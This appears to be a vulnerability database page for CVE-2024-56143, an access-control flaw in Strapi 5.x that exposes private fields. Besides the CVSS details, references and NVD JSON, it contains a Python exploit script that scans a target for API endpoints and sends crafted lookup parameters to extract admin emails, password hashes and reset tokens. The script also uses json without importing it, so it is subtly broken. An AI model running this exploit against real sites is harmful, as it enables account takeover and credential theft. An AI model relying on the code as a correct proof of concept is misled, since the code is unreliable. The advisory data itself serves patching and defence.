CVE-2024-56143

Description

Strapi is an open-source headless content management system. In versions from 5.0.0 to before 5.5.2, the lookup operator provided by the document service does not properly sanitize query parameters for private fields. An attacker can access private fields, including admin passwords and reset tokens, by crafting queries with the lookup parameter. This vulnerability is fixed in 5.5.2.

CVSS Details

CVSS Score

8.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:strapi:strapi:*:*:*:*:*:*:*:* - VULNERABLE

Strapi >=5.0.0, <5.5.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target Strapi instance URL
TARGET_URL = "http://target-strapi-instance.com"

# Step 1: Discover API endpoints
def discover_endpoints(base_url):
    # Common Strapi content types to probe
    content_types = ["articles", "users", "products", "categories"]
    endpoints = []
    for ct in content_types:
        url = f"{base_url}/api/{ct}"
        try:
            resp = requests.get(url, timeout=5)
            if resp.status_code == 200:
                endpoints.append(ct)
        except requests.exceptions.RequestException:
            pass
    return endpoints

# Step 2: Exploit lookup operator to access private fields
def exploit_lookup(base_url, content_type):
    """
    Craft a request using the lookup parameter to bypass field-level access control
    and extract private fields like admin passwords and reset tokens.
    """
    # The vulnerable lookup parameter allows accessing private fields
    # of related entities (e.g., admin users associated with content)
    exploit_params = {
        "lookup[admin][fields][0]": "email",
        "lookup[admin][fields][1]": "password",
        "lookup[admin][fields][2]": "resetPasswordToken",
        "lookup[admin][populate]": "*"
    }

    url = f"{base_url}/api/{content_type}"
    headers = {
        "Content-Type": "application/json",
        "User-Agent": "Mozilla/5.0"
    }

    try:
        resp = requests.get(url, params=exploit_params, headers=headers, timeout=10)
        if resp.status_code == 200:
            data = resp.json()
            print(f"[+] Successfully extracted data from {content_type}:")
            print(json.dumps(data, indent=2))
            return data
        else:
            print(f"[-] Request failed with status: {resp.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
    return None

# Step 3: Use extracted credentials for further exploitation
def extract_credentials(data):
    """Extract admin credentials from leaked data"""
    credentials = []
    if data and "data" in data:
        for item in data["data"]:
            if "admin" in item:
                admin = item["admin"]
                credentials.append({
                    "email": admin.get("email"),
                    "password_hash": admin.get("password"),
                    "reset_token": admin.get("resetPasswordToken")
                })
    return credentials

if __name__ == "__main__":
    print("[*] CVE-2024-56143 - Strapi Private Field Disclosure PoC")
    print(f"[*] Target: {TARGET_URL}")

    endpoints = discover_endpoints(TARGET_URL)
    print(f"[*] Discovered endpoints: {endpoints}")

    for endpoint in endpoints:
        data = exploit_lookup(TARGET_URL, endpoint)
        if data:
            creds = extract_credentials(data)
            if creds:
                print(f"[+] Extracted credentials: {creds}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2024-56143
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2024-56143
[3] CVE Details https://www.cvedetails.com/cve/CVE-2024-56143/
[4] VulDB https://vuldb.com/cve/CVE-2024-56143
[5] https://github.com/strapi/strapi/commit/0c6e0953ae1e62afae9329de7ae6d6a5e21b95b8
[6] https://github.com/strapi/strapi/security/advisories/GHSA-495j-h493-42q2

Raw JSON Data

JSON

{"cve": {"id": "CVE-2024-56143", "sourceIdentifier": "[email protected]", "published": "2025-10-16T16:15:36.183", "lastModified": "2025-12-31T01:05:40.340", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Strapi is an open-source headless content management system. In versions from 5.0.0 to before 5.5.2, the lookup operator provided by the document service does not properly sanitize query parameters for private fields. An attacker can access private fields, including admin passwords and reset tokens, by crafting queries with the lookup parameter. This vulnerability is fixed in 5.5.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:strapi:strapi:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.0.0", "versionEndExcluding": "5.5.2", "matchCriteriaId": "579D30B7-009F-49AB-B595-C3BC930594D9"}]}]}], "references": [{"url": "https://github.com/strapi/strapi/commit/0c6e0953ae1e62afae9329de7ae6d6a5e21b95b8", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/strapi/strapi/security/advisories/GHSA-495j-h493-42q2", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}